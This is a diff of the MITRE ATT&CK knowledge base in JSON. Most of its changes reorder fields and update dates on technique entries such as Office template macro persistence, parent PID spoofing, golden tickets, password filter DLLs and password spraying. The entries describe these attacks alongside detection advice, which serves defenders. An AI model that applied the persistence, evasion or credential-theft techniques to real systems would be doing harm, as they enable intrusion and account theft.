+ "description": "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)\n\nOffice Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can be inserted into the base template and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded.(Citation: enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates may also be stored and pulled from remote locations.(Citation: GlobalDotName Jun 2019) \n\nWord Normal.dotm location:
\nC:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\n\nExcel Personal.xlsb location:
\nC:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\PERSONAL.XLSB\n\nAdversaries may also change the location of the base template to point to their own by hijacking the application's search order, e.g. Word 2016 will first look for Normal.dotm under C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\, or by modifying the GlobalDotName registry key. By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location.(Citation: GlobalDotName Jun 2019) \n\nAn adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.",
"id": "attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -17920,25 +18584,25 @@
"phase_name": "persistence"
}
],
- "modified": "2020-03-25T23:49:21.679Z",
+ "modified": "2020-06-25T17:48:08.916Z",
"created": "2019-11-07T20:29:17.788Z",
- "x_mitre_platforms": [
- "Windows",
- "Office 365"
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
],
+ "x_mitre_detection": "Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page) Modification to base templates, like Normal.dotm, should also be investigated since the base templates should likely not contain VBA macros. Changes to the Office macro security settings should also be investigated.(Citation: GlobalDotName Jun 2019)",
"x_mitre_data_sources": [
"Windows Registry",
"Process monitoring",
"Process command-line parameters",
"File monitoring"
],
- "x_mitre_detection": "Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page) Modification to base templates, like Normal.dotm, should also be investigated since the base templates should likely not contain VBA macros. Changes to the Office macro security settings should also be investigated.(Citation: GlobalDotName Jun 2019)",
- "x_mitre_permissions_required": [
- "User",
- "Administrator"
- ],
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true
+ "x_mitre_platforms": [
+ "Windows",
+ "Office 365"
+ ]
},
{
"external_references": [
@@ -17974,10 +18638,16 @@
],
"modified": "2020-03-20T15:27:51.559Z",
"created": "2019-11-07T19:44:04.475Z",
- "x_mitre_platforms": [
- "Windows",
- "Office 365"
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_system_requirements": [
+ "Office 2007, 2010, 2013, and 2016"
],
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
+ ],
+ "x_mitre_detection": "Monitor for the creation of the Office Test Registry key. Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence. Since v13.52, Autoruns can detect tasks set up using the Office Test Registry key.(Citation: Palo Alto Office Test Sofacy)\n\nConsider monitoring Office processes for anomalous DLL loads.",
"x_mitre_data_sources": [
"DLL monitoring",
"Loaded DLLs",
@@ -17986,16 +18656,10 @@
"File monitoring",
"Windows Registry"
],
- "x_mitre_detection": "Monitor for the creation of the Office Test Registry key. Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence. Since v13.52, Autoruns can detect tasks set up using the Office Test Registry key.(Citation: Palo Alto Office Test Sofacy)\n\nConsider monitoring Office processes for anomalous DLL loads.",
- "x_mitre_permissions_required": [
- "Administrator",
- "User"
- ],
- "x_mitre_system_requirements": [
- "Office 2007, 2010, 2013, and 2016"
- ],
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true
+ "x_mitre_platforms": [
+ "Windows",
+ "Office 365"
+ ]
},
{
"external_references": [
@@ -18026,11 +18690,12 @@
],
"modified": "2020-03-26T23:26:10.109Z",
"created": "2020-03-14T22:45:52.963Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
],
+ "x_mitre_detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. Analyze network data for uncommon data flows. User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)",
"x_mitre_data_sources": [
"Host network interface",
"Netflow/Enclave netflow",
@@ -18038,12 +18703,11 @@
"Packet capture",
"SSL/TLS inspection"
],
- "x_mitre_detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. Analyze network data for uncommon data flows. User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -18084,22 +18748,22 @@
],
"modified": "2020-03-26T17:35:15.823Z",
"created": "2019-11-07T20:06:02.624Z",
- "x_mitre_platforms": [
- "Windows",
- "Office 365"
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
],
+ "x_mitre_detection": "Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.",
"x_mitre_data_sources": [
"Mail server",
"Process command-line parameters",
"Process monitoring"
],
- "x_mitre_detection": "Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.",
- "x_mitre_permissions_required": [
- "Administrator",
- "User"
- ],
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true
+ "x_mitre_platforms": [
+ "Windows",
+ "Office 365"
+ ]
},
{
"external_references": [
@@ -18140,22 +18804,22 @@
],
"modified": "2020-03-26T17:35:51.656Z",
"created": "2019-11-07T20:09:56.536Z",
- "x_mitre_platforms": [
- "Windows",
- "Office 365"
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
],
+ "x_mitre_detection": "Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.",
"x_mitre_data_sources": [
"Mail server",
"Process monitoring",
"Process command-line parameters"
],
- "x_mitre_detection": "Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.",
- "x_mitre_permissions_required": [
- "Administrator",
- "User"
- ],
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true
+ "x_mitre_platforms": [
+ "Windows",
+ "Office 365"
+ ]
},
{
"external_references": [
@@ -18196,22 +18860,22 @@
],
"modified": "2020-03-26T17:36:15.923Z",
"created": "2019-11-07T20:00:25.560Z",
- "x_mitre_platforms": [
- "Windows",
- "Office 365"
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
],
+ "x_mitre_detection": "Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.",
"x_mitre_data_sources": [
"Mail server",
"Process monitoring",
"Process command-line parameters"
],
- "x_mitre_detection": "Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.",
- "x_mitre_permissions_required": [
- "Administrator",
- "User"
- ],
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true
+ "x_mitre_platforms": [
+ "Windows",
+ "Office 365"
+ ]
},
{
"id": "attack-pattern--9ddc2534-e91c-4dab-a8f6-43dab81e8142",
@@ -18296,9 +18960,9 @@
"description": "Chester, A. (2017, November 20). Alternative methods of becoming SYSTEM. Retrieved June 4, 2019."
},
{
- "description": "Schofield, M. & Satran, M. (2018, May 30). Process Creation Flags. Retrieved June 4, 2019.",
+ "source_name": "Microsoft Process Creation Flags May 2018",
"url": "https://docs.microsoft.com/windows/desktop/ProcThread/process-creation-flags",
- "source_name": "Microsoft Process Creation Flags May 2018"
+ "description": "Schofield, M. & Satran, M. (2018, May 30). Process Creation Flags. Retrieved June 4, 2019."
},
{
"description": "Secuirtyinbits . (2019, May 14). Parent PID Spoofing (Stage 2) Ataware Ransomware Part 3. Retrieved June 6, 2019.",
@@ -18311,7 +18975,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Parent PID Spoofing",
- "description": "Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.(Citation: Microsoft UAC Nov 2018)\n\nAdversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1086)/[Rundll32](https://attack.mitre.org/techniques/T1085) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [VBScript](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)\n\nExplicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. 
administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)",
+ "description": "Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.(Citation: Microsoft UAC Nov 2018)\n\nAdversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1086)/[Rundll32](https://attack.mitre.org/techniques/T1085) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)\n\nExplicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. 
administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)",
"id": "attack-pattern--93591901-3172-4e94-abf8-6034ab26f44a",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -18324,29 +18988,29 @@
"phase_name": "privilege-escalation"
}
],
- "modified": "2020-03-26T21:45:30.415Z",
+ "modified": "2020-04-16T19:37:02.030Z",
"created": "2020-02-18T18:22:41.448Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_contributors": [
+ "Wayne Silva, F-Secure Countercept"
],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
+ ],
+ "x_mitre_defense_bypassed": [
+ "Heuristic Detection",
+ "Host forensic analysis"
+ ],
+ "x_mitre_detection": "Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.(Citation: CounterCept PPID Spoofing Dec 2018)\n\nMonitor and analyze API calls to CreateProcess/CreateProcessA, specifically those from user/potentially malicious processes and with parameters explicitly assigning PPIDs (ex: the Process Creation Flags of 0x8XXX, indicating that the process is being created with extended startup information(Citation: Microsoft Process Creation Flags May 2018)). Malicious use of CreateProcess/CreateProcessA may also be proceeded by a call to UpdateProcThreadAttribute, which may be necessary to update process creation attributes.(Citation: Secuirtyinbits Ataware3 May 2019) This may generate false positives from normal UAC elevation behavior, so compare to a system baseline/understanding of normal system activity if possible.",
"x_mitre_data_sources": [
"API monitoring",
"Process monitoring",
"Windows event logs"
],
- "x_mitre_detection": "Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.(Citation: CounterCept PPID Spoofing Dec 2018)\n\nMonitor and analyze API calls to CreateProcess/CreateProcessA, specifically those from user/potentially malicious processes and with parameters explicitly assigning PPIDs (ex: the Process Creation Flags of 0x8XXX, indicating that the process is being created with extended startup information(Citation: Microsoft Process Creation Flags May 2018)). Malicious use of CreateProcess/CreateProcessA may also be proceeded by a call to UpdateProcThreadAttribute, which may be necessary to update process creation attributes.(Citation: Secuirtyinbits Ataware3 May 2019) This may generate false positives from normal UAC elevation behavior, so compare to a system baseline/understanding of normal system activity if possible.",
- "x_mitre_defense_bypassed": [
- "Heuristic Detection",
- "Host forensic analysis"
- ],
- "x_mitre_permissions_required": [
- "User",
- "Administrator"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_contributors": [
- "Wayne Silva, Countercept"
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -18412,20 +19076,20 @@
],
"modified": "2020-03-23T16:24:34.766Z",
"created": "2020-01-30T16:36:51.184Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_defense_bypassed": [
+ "System Access Controls"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Audit all logon and credential use events and review for discrepancies. Unusual remote logins that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity. NTLM LogonType 3 authentications that are not associated to a domain login and are not anonymous logins are suspicious.",
+ "x_mitre_data_sources": [
+ "Authentication logs"
],
"x_mitre_contributors": [
"Travis Smith, Tripwire"
],
- "x_mitre_data_sources": [
- "Authentication logs"
- ],
- "x_mitre_detection": "Audit all logon and credential use events and review for discrepancies. Unusual remote logins that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity. NTLM LogonType 3 authentications that are not associated to a domain login and are not anonymous logins are suspicious.",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_defense_bypassed": [
- "System Access Controls"
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -18521,24 +19185,24 @@
],
"modified": "2020-03-12T17:03:16.122Z",
"created": "2020-01-30T17:03:43.072Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_defense_bypassed": [
+ "System Access Controls"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_system_requirements": [
+ "Kerberos authentication enabled"
+ ],
+ "x_mitre_detection": "Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.\n\nEvent ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to \"Integrity check on decrypted field failed\" and indicates misuse by a previously invalidated golden ticket.(Citation: CERT-EU Golden Ticket Protection)",
+ "x_mitre_data_sources": [
+ "Authentication logs"
],
"x_mitre_contributors": [
"Vincent Le Toux",
"Ryan Becwar"
],
- "x_mitre_data_sources": [
- "Authentication logs"
- ],
- "x_mitre_detection": "Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.\n\nEvent ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to \"Integrity check on decrypted field failed\" and indicates misuse by a previously invalidated golden ticket.(Citation: CERT-EU Golden Ticket Protection)",
- "x_mitre_system_requirements": [
- "Kerberos authentication enabled"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_defense_bypassed": [
- "System Access Controls"
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -18568,25 +19232,24 @@
"phase_name": "credential-access"
}
],
- "modified": "2020-03-24T20:01:56.911Z",
+ "modified": "2020-07-09T17:01:18.054Z",
"created": "2020-02-11T18:38:56.197Z",
+ "x_mitre_data_sources": [
+ "Authentication logs",
+ "Office 365 account logs"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network. Consider focusing efforts on detecting other adversary behavior used to acquire credential materials, such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows",
- "Azure",
"Office 365",
"Azure AD"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network. Consider focusing efforts on detecting other adversary behavior used to acquire credential materials, such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_data_sources": [
- "Authentication logs",
- "Office 365 account logs"
]
},
{
@@ -18652,22 +19315,22 @@
],
"modified": "2020-03-25T20:59:05.209Z",
"created": "2020-02-11T19:05:45.829Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification Packages) and correlate then investigate the DLL files these files reference.\n\nPassword filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)",
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM"
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "DLL monitoring"
],
"x_mitre_contributors": [
"Vincent Le Toux"
],
- "x_mitre_data_sources": [
- "File monitoring",
- "DLL monitoring"
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM"
+ ],
+ "x_mitre_detection": "Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification Packages) and correlate then investigate the DLL files these files reference.\n\nPassword filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -18704,6 +19367,19 @@
],
"modified": "2020-03-29T17:11:46.504Z",
"created": "2020-02-11T18:38:22.617Z",
+ "x_mitre_contributors": [
+ "Microsoft Threat Intelligence Center (MSTIC)"
+ ],
+ "x_mitre_data_sources": [
+ "Authentication logs",
+ "Office 365 account logs"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -18714,19 +19390,6 @@
"AWS",
"Azure",
"SaaS"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_data_sources": [
- "Authentication logs",
- "Office 365 account logs"
- ],
- "x_mitre_contributors": [
- "Microsoft Threat Intelligence Center (MSTIC)"
]
},
{
@@ -18763,26 +19426,42 @@
],
"modified": "2020-03-26T17:17:42.457Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
- "x_mitre_contributors": [
- "Sudhanshu Chauhan, @Sudhanshu_C"
- ],
- "x_mitre_data_sources": [
- "Process command-line parameters",
- "Process monitoring"
- ],
- "x_mitre_detection": "Monitor processes for tools and command line arguments that may indicate they're being used for password policy discovery. Correlate that activity with other suspicious activity from the originating system to reduce potential false positives from valid user or administrator activity. Adversaries will likely attempt to find the password policy early in an operation and the activity is likely to happen with other Discovery activity.",
- "x_mitre_permissions_required": [
- "User"
- ],
+ "x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Windows",
"Linux",
"macOS"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Monitor processes for tools and command line arguments that may indicate they're being used for password policy discovery. Correlate that activity with other suspicious activity from the originating system to reduce potential false positives from valid user or administrator activity. Adversaries will likely attempt to find the password policy early in an operation and the activity is likely to happen with other Discovery activity.",
+ "x_mitre_data_sources": [
+ "Process command-line parameters",
+ "Process monitoring"
+ ],
+ "x_mitre_contributors": [
+ "Sudhanshu Chauhan, @Sudhanshu_C"
+ ],
+ "x_mitre_version": "1.1"
},
{
+ "created": "2020-02-11T18:39:25.122Z",
+ "modified": "2020-03-29T17:13:57.172Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "credential-access"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c",
+ "description": "Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)\n\nTypically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)\n\nIn default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows \"logon failure\" event ID 4625.",
+ "name": "Password Spraying",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -18805,22 +19484,6 @@
"description": "Metcalf, S. (2018, May 6). Trimarc Research: Detecting Password Spraying with Security Event Auditing. Retrieved January 16, 2019."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Password Spraying",
- "description": "Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)\n\nTypically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)\n\nIn default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows \"logon failure\" event ID 4625.",
- "id": "attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "credential-access"
- }
- ],
- "modified": "2020-03-29T17:13:57.172Z",
- "created": "2020-02-11T18:39:25.122Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -18851,7 +19514,7 @@
"id": "attack-pattern--c4ad009b-6e13-4419-8d21-918a1652de02",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Path Interception",
